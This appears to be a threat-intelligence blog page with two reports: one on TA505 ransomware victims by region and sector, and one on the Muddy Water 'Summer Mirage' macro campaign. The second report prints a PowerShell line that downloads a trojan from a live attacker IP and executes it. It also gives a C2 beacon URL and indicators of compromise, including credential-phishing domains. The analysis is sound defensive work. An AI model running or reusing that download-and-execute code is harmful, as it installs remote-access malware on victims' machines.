Thursday, January 30, 2020

TA 505 - Global Ransomware Criminals

Authors:  Danny Adamitis  , Ian Winslow

Overview



Prevailion’s Tailored Intelligence Team has continued to follow an evolving threat actor group dubbed TA505 - a known cyber criminal organization that has likely been active since at least 2017, whose motives are speculated to be financial in nature. This group has been known to infect victims through business email compromise. Once a victim’s system is initially compromised, TA505 has been observed utilizing a wide variety of commercially available and custom remote access trojans. Upon gaining access, with a trojan in the network, they have been observed stealing sensitive financial data and in some cases deploying ransomware as recently as October of 2019.


In our effort to track the proliferation of cybercrime, corresponding to a 300% rise in ransomware cases including the Clop ransomware, Prevailion began to pursue the modified tools that were deployed by this threat actor. We were able to associate samples to this group based upon known tactics, techniques and procedures (TTPs) that led us to active Command and Control (C2) nodes. Once we have collected abundant telemetry associated with the C2 nodes, we then analyze the data using proprietary mathematically-driven algorithms. This allows us to minimize any collection bias and to filter out many false positives. From the output of this process, we called the refined data Evidence of Compromise (EoC), this allows us to create a global contagion snapshot that represents a subset of potentially impacted organizations. During our analysis of this campaign we were able to identify at least one U.S. based electrical company, a U.S. state government network, and one of the world’s largest twenty-five banks exhibiting evidence of compromise. The map below denotes organizations that present EoC associated with TA505 indicators. 
Prevailion Global Contagion Snapshot of TA505 Activities.


By continuously monitoring EoC Prevailion draws insights into operational trends, such as which regions and verticals are currently experiencing activity, from this threat actor. This visibility will help customers better understand the environment that encompasses their extended network - which includes of all their trusted and 3rd party partners’ networks. This is meant to augment traditional telemetry to better prioritize alerts from security products such as email appliances, firewalls, and antivirus. Prevailion’s platform will help users make better informed decisions, in order to make sure your organization does not become another statistic.


Compromise Intelligence Details



Threat Activities Associated with TA505


Prevailion’s Tailored Intelligence Team has continued to follow an evolving threat actor group dubbed TA505 - a known cyber criminal organization that has likely been active since at least 2017. Based upon their previous targeting trends, their motives are likely to be influenced by financial gain. This group has been observed infecting victims through spam campaigns that either contain malicious Microsoft office files, or a URL to a malicious domain. Once the victim is infected, TA505 is known to use a wide variety of commercially available and new remote access trojans. Most recently these threat actors have recently been observed deploying  FlawedGrace, FlawedAmmyy, Snatch, SDBbot, and ServHelper. One unique method employed by this group includes using various encodes to aid in detection evasion. They have been observed using both the shikata-ga-nai encoder according to FireEye, and custom packers. In order to aid in reversing efforts, an unpacker was released on GitHub by Tera0017. 


In other cases they have been observed deploying signed binaries of FlawedAmmyy. Once the threat actors have established persistence within a network, they are able to steal confidential information. In some cases they have deployed different varieties of ransomware including Locky, Jaff, Global Imposter and most recently Clop ransomware.    


Compromise Intelligence Analysis Regional Breakdown


The Tailored Intelligence Team at Prevailion has uncovered malicious activity around the globe associated with TA505. Our telemetry shows targeting in six continents, spread across a multitude of different sectors and countries. The most impacted geographic area, according to our telemetry, was Europe. Through our analysis of these victims, researchers uncovered that the two most infected verticals were education and finance.


Prevailion European Contagion Snapshot of TA505 Activities.


The second most impacted region was North America, particularly the United States. In our analysis of North American based targets, the two most predominant verticals were education, and wholesale trade. Interestingly, we also noticed that there was a large number of victims that appeared in the Asia-Pacific region. Predominantly these victims were located in Taiwan. Here we’ve seen heavy infiltration of government ministries. This vertical constituted 67% of all targeting in the region. This trend of targeting Government will be further explored in the coming sections of this report.

Classification of Victims by Vertical 


Prevailion is not only able to break victims down by geographic displacement, but also cluster victims into verticals. We observed EoCs suggesting the verticals of education, finance, and public administration were heavily compromised by this group. There were additional compromised organizations in wholesale trade, and healthcare to a lesser extent, with a few victims in miscellaneous categories. Some of the victim organizations in the other category included a US based energy company and transportation organizations such as an airline.


Overall Contagion Snapshot By Sector of TA505 Activities.


Infection within the education vertical, primarily universities, was most rampant. While it stands to reason that larger universities could have originally shown indicators of compromise as a result of their own research departments, such as a web crawler, most of those which showed EoC were smaller universities. The telemetry associated with these smaller institutes appears to closely mirror the patterns of other known victims across the spectrum, denoting that they are almost certainly infected. 


We hypothesize that some organizations presenting EoC, such as the smaller universities, are more likely targets of opportunity as they lack sufficient security resources when compared to more hardened networks in the banking or insurance vertical. Throughout 2019 there have been reports of universities being extorted for payment or threatened with ransomware. Another potential motivation for the focus on these establishments could be that they are useful as a staging ground and may be employed by attackers to gain access to more hardened networks. Prevailion previously reported upon this tactic in Operation BlockChain Gang last year, where compromised email accounts and a hostname were used in a subsequent attack.


Focus on the Finance and Insurance Vertical


The financial sector appeared to be one of the primary targets of TA505, with the group hitting multiple banks and insurance organizations worldwide. We noted similar activity as other firms in the security industry, where they used ServHelper in at least one operation in the finance vertical. TA505 effort’s resulted in evidence of compromise being exhibited by at least one of the top twenty-five banks in the world; the list of the top twenty-five banks was curated by S&P’s Global Marketing Intelligence team. We also identified activity associated with a prominent non-government organization involved in finance. 


We proceeded to identify additional targeting associated with this group, in particular their efforts against French financial organizations. This led us to detect an unusually large concentration of malicious domains hitting the same French-based groups. Our conclusion is that the threat actors were able to deploy multiple trojans within the same network, which would allow persistent access if a single command and control channel went offline, or if an agent was detected.


Finance and Investment Sector snapshot by country of TA505 Activities.


As the graphic above shows, we were able to detect that similar organizations throughout the world that were targeted. We observed that financial structures in the US and Italy were also included in the operation. Based on previous knowledge of TA505 techniques, we hypothesize that this is a continuation of their activities intended to steal sensitive financial data.


Focus on Public Administration Vertical 


One other area where we observed TA505 activity was public administrations, which is comprised of both municipal and federal government entities, across the globe. This correlates with recent cyber activities against various governments that we have observed throughout the past year. While TA505 has not been part of any of the higher profile cases such as the one against Baltimore city or the Atlanta airport  We have identified at least a U.S. state government networks that was actively compromised by this group. 


While there has been significant reporting on these activities in the United States, Prevailion has observed EoC across a number of countries to include France, Taiwan, Great Britain, and the US. One interesting datapoint was that Taiwan, not the United States, actually lead this category in terms of displaying the majority of EoC after we ran the post processing scripts. This suggests that more public administrative organizations will experience ransomware attacks, it is likely to become more of a global issue. We predict this trend is likely to continue as long as we see these victims continuing to pay the ransom. Organizations in this vertical should continue to be on alert for this group. 
Public Administration Sector snapshot by country of TA505 Activities.


Conclusion



The threat actor group known as TA505 has been active since 2017, and does not show any sign of slowing down in the coming year. According to Verizon data breach report of 2019, external financially motivated threat actors are still the most prevalent cause of data breaches. With the continued activity from groups such as this and many others, and the average cost of a data breach approaching 3.9 million dollars according to IBM, the cost of not taking this threat seriously could prove to be quite expensive. 


While these threat actors may not operate at the level of most APTs, they are still highly successful at compromising organizations. They have proven themselves capable of avoiding detection through various techniques such as signing binaries with legitimate certificates and obfuscating payloads with encoders. Global targeting is likely to encompass additional verticals and locations, however, our compromise intelligence platform enables us to draw new insights into where this threat actor is having the most success. With this information we can better protect our customers, and inform security-conscious readers through posts such as this on TA505. 

Tuesday, January 7, 2020

Summer Mirage

Muddy Water strikes again in Summer Mirage Campaign

Author: Danny Adamitis 

Overview

The research team at Prevailion has uncovered new aspects of sophisticated campaigns that we associate with high confidence to the Muddy Water threat actors. Security researchers, such as FireEye, have stated Muddy Water activity was tied to a group with an Iran-nexus. We have dubbed this campaign “Summer Mirage,” and we assess that it is a continuation of activity previously reported campaign called “BlackWater”.

Prevailion uncovered two new malicious documents; one which discussed Stephen Moore’s appointment to the Federal Reserve, the second document discussed companies that extract and process crude oil. Both of these documents relied upon socially engineering their victims into enabling macros in order to infect the targeted workstation. Once macros were enabled, the threat actor-written code would attempt to obtain a trojan hosted on an adversarial payload command and control node. This was a fully functional remote access trojan, that would allow the threat actors to interact with the compromised workstation via the adversarial interactive command and control node.  


This activity shows an increased level of sophistication from related samples observed months prior. The threat actor added a persistence feature at the document level, in order to try and establish persistence on the workstation. One notable feature was that the macro was named “H-3 Airstrike,” which was likely a reference to a surprise air attack by the Iranian Air Force during the Iran–Iraq War, in which they destroyed Iraqi aircraft to include a new shipment of Mirage F1 planes. The threat actors also added some new features to the PowerShell based trojan called POWERSTATS, such as a secondary command and control server.

Through analysis of the interactive command and control node, Prevailion observed one domain that briefly resolved to a particular IP address. 91[.]132[.]139[.]196, before moving to a new command and control node that was used to harvest credentials. This brief overlap in IP addresses represents an operational mistake by the threat actor, allowing us to identify this credential-harvesting command and control node which hosted numerous typo-squatted domains that appeared to mimic login services. We assess with moderate confidence that these domains were used to harvest credentials from targeted accounts.   

While we acknowledge that these campaigns likely occurred during the summer of 2019; given the historical targeting trends combined with the subject matter of the two documents, we thought it prudent to report these findings. We suspect that previously compromised networks would be particularly vulnerable to attacks, as attempts to infiltrate new targets are likely going to be extremely difficult at a time of heightened awareness. This report documents the increased and unreported activity in the sector, and documenting their relevant TTPs to better inform security practitioners. We encourage at-risk organizations to update and properly configure end-point antivirus and email filters, as well as training employees not to enable macros on documents coming from untrusted sources. 


Technical Details

Muddy Water draws inspiration from Washington


The research team at Prevailion has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor Muddy Water, and these indicators are likely a continuation of the BlackWater campaign that was previously reported by Cisco Talos. Muddy Water has been active since at least November 2017 and these indicators revealed some of their latest tactics, techniques and procedures (TTPs). We suspect that these documents were sent to victims via phishing emails. 


One previously unreported document, that had a creation date of April 23th, 2019 according to metadata, discussed “Stephen Moore, the economic advisor to the president Trump [of the United States] plans to nominate [Moore] to the federal reserve.” This date coincides with a New York Times article published April 23, 2019 that generated a flurry of headlines around Moore’s nomination and was the source of the text pasted into Muddy Water’s document.




Upon further analysis of this document, it contained a malicious macro named “BlackWater”. The macro was the same one previously reported and even referenced the same command and control node, hxxp://38[.]132[.]99[.]167/crf.txt.  


New Document targeting the Petroleum Vertical 


In late June 2018, specifically the 25th based off document metadata, another document turned up that we associated with high confidence to this campaign named “letter.doc.” The verbiage appeared to target members of the oil and gas vertical.


Image of the trojanized document prior to enabling macros 


Image of the trojanized document after macros were enabled 


The document contained a macro named “H3OpAirStrike”. This could be a reference to the “H-3 airstrike” which was a surprise air attack by the Iranian Air Force during the Iran–Iraq War on 4 April 1981 against the airbases of the Iraqi Air Force at the H-3 Air Base in western Iraq. The Iranians claimed that they destroyed 48 Iraqi aircraft on the ground with no losses of their own. (link) One of the other variables was named “Mirage F1” which was the type of aircraft the Iraqi Air Force was using at the time of the H-3 airstrike. (link)  


Deobfsucated version of the H3AirStrike.bas macro 


This second macro contains some new features that were not previously associated with this group. According to Microsoft documents, the H3AirStrike2.bas macro created a task that is scheduled to execute at a start boundary. This start boundary would be defined by the threat actors. The code ensured that the task would run, remain hidden, and run even if the machine is operating on battery power. This adversarial created task would be named “MSOfficeUpdate”. 


Deobfsucated version of the H3AirStrike2.bas macro 


Once the document’s macro was run it communicated with the adversarial command and control server located at hxxp://104[.]237[.]255[.]195/p.txt, in order to obtain the PowerShell payload. 


$ErrorActionPreference='SilentlyContinue';function gtcr(){ try { $wecieoject = New-Object System.Net.WebClient; $wecieoject.Proxy = [System.Net.WebProxy]::GetDefaultProxy(); $wecieoject.UseDefaultCredentials=$true; $wecieoject.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; 
$coreoet = $wecieoject.DownloadString("http://104.237.255.195/p.txt"); } catch { "WoW";sleep -s 60; gtcr;} iex($coreoet)} gtcr


PowerShell code run that would obtain the fully functional PowerShell Trojan 


The PowerShell trojan was hosted on an adversarial controlled command and control node. 
The threat actors also took additional steps to obfuscate the payload using an open-source framework called Invoke-obfuscation. This would likely complicate analysis of the sample,and decrease its discovery rate by endpoint detection. 


Image of p.txt as it would appear when downloaded 


Image of p.txt once deobfuscated 


Once the payload was deobfuscated, it was revealed to be the same PowerShell trojan, called POWERSTATS, that the group used in the early part of last year. In fact some of the variable names used such as HS, OA, OFN, UN, and PIA are even the same. Similar to the previous BlackWater campaign, the trojan would perform some host based enumeration and then append that data to a URL post request to the interactive command and control node. The host based information obtained was the:
  • workstation’s name
  • workstation’s Operating System Architecture
  • workstation’s caption
  • workstation’s domain
  • workstaion’s username
  • workstation’s public IP address
  • workstation’s MD5 hash of the cryptographic service.
This could serve as a unique identifier in case a user has multiple workstations. There were also similarities in the structure of the URL request. The URL contained the same string “?rCecms=[macro name] format. For example: 


"http://91.132.139.196/prxy.php?rCecms=H3OpAirStrike"


There were a few new features added to this PowerShell script from the previously reported version. The new trojan obtained the public IP address from ident.me. They also embedded a second command and control IP address, 194[.]187[.]249[.]78, further down in the script, files downloaded from this IP address would be placed in the Downloads folder. 


Screenshot of the EXCcNANscr function, with the secondary C2


Once the files were downloaded the author added an easter egg comment to remind the operator to “!!Please Check if File is Available, Who Knows What the AV Will do!!” 


Deobfuscated function DnLDFILE



Credential Harvesting Campaign

Searching on passive DNS (pDNS) history associated with the interactive command and control node at IP address 91[.]132[.]139[.]196, there was one domain, account-signin-secure[.]com, that resolved to this IP address for one day on April 17th, 2019. The following day, March 18th, that domain then moved to the IP address 91[.]132[.]139[.]194. Searching on pDNS records associated with the IP address 91[.]132[.]139[.]194 revealed the following typo-squatted domains.


Cluster 1 - Typo Squatted Domains 
Date 
Domain
IP Address 
2019-06-11
logind2-secure.tk
91.132.139.194
2019-04-25
accesemailaccount.tk
91.132.139.194
2019-04-23
reauth92-services.sytes.net
91.132.139.194
2019-04-22
roadtosultan1.org
91.132.139.194
2019-04-17
apikeyallervice.com
91.132.139.194
2019-04-20
apikeyallervice.business
91.132.139.194
2019-04-17
signin-secure.tk
91.132.139.194
2019-04-16
login-dc2-verifyaccounts.ga
91.132.139.194
2019-04-15
login-dc2-verifyaccounts.tk
91.132.139.194
2019-04-15
login-secure-account.cf
91.132.139.194
2019-04-15
login-secure-account.ml
91.132.139.194
2019-04-13
service0auht-center.ddns.net
91.132.139.194


Two URLs associated with aforementioned domains were; -hxxps://login-secure-account.ml/bocah/[email protected]&Account-Unlock&sessionsid=VCfwm6Qm0NN5Pj6hQS3sDjaTPwui5MsNeMXDyi2EHAFdVyxMVpOiIWqjF2bx1wQw0JZdegJimuwtF3C0oOCgzT9BfSKhuvySjlY4PNAqyRpT2pPQSNX&protocol=ssl
-hxxps://login-dc2-verifyaccounts.tk/Manages?abuse%40icloud_com%26stats%3Daccount_unlock%26sessionsid%3DhGGVkFA24EjQ83R85DKcfPN3tNlqqalwaFSarDV1dgd7lxkerGwD1T88pQRuJvyr1d9oGxBsORXnu7bYBwjavn%26protocol%3Dssl=


Based upon these URLs, we suspect that these domains were likely used in operations to harvest end-user credentials. Through analyzing domains associated with the IP address 91.132.139[.]194, we were able to discover one hostname, reauth92-services.sytes.net, and one domain, login-secure-account.ml, that overlapped with the IP address 91.132.139.159. This lead us to discover “Cluster 2” of typo-squatted domains. We associate cluster 2 to this same threat actor. 


Cluster 2 - Typo Squatted Domains 
Date 
Domain 
IP address 
2019-04-18
loginaccounts.cf
91.132.139.159
2019-04-12
login-secure-account.gq
91.132.139.159
2019-06-29
login-accounts.gq
91.132.139.159
2019-04-14
accounts-login.ga
91.132.139.159
2019-04-11
reauth92-services.sytes.net
91.132.139.159
2019-04-11
login-secure-account.ml
91.132.139.159
2019-04-15
accounts-login.gq
91.132.139.159
2019-04-08
secure-login-accounts.gq
91.132.139.159
2019-04-16
accountslogin.ga
91.132.139.159


Indicators of Compromise 
Sha256 Hashes 
4d72dcd33379fe7a34f9618e692f659fa9d318ab623168cd351c18ca3a805af1
95c650a540ed5385bd1caff45ba06ff90dc0773d744efc4c2e4b29dda102fcce
F779ccc3da9d8c62a9596c3567b38cabfa1b1292129c1a77db67aaffb7828fe2
F327abed77b4b19b4471eaebf722295b8e50a47f36a4d7662cac91b1a622e64a


URLs
hxxp://38[.]132[.]99[.]167/crf.txt
hxxp://104[.]237[.]255[.]195/p.txt
hxxp://91[.]132[.]139[.]196/prxy.php?rCecms=H3OpAirStrike
hxxp://194[.]187[.]249[.]78/


IPs
38[.]132[.]99[.]167
104[.]237[.]255[.]195
91[.]132[.]139[.]196
91[.]132[.]139[.]194
91[.]132[.]139[.]159
194[.]187[.]249[.]78


Domains
logind2-secure.tk
accesemailaccount.tk
reauth92-services.sytes.net
roadtosultan1.org
apikeyallervice.com
apikeyallervice.business
signin-secure.tk
login-dc2-verifyaccounts.ga
login-dc2-verifyaccounts.tk
login-secure-account.cf
login-secure-account.ml
Service0auht-center.ddns.net
loginaccounts.cf
login-secure-account.gq
login-accounts.gq
accounts-login.ga
login-secure-account.ml
accounts-login.gq
secure-login-accounts.gq

accountslogin.ga

The Curious Case of the Criminal Curriculum Vitae

  Executive Summary The Tailored Intelligence Team at Prevailion has detected a new campaign — at least a facet of which is currently a...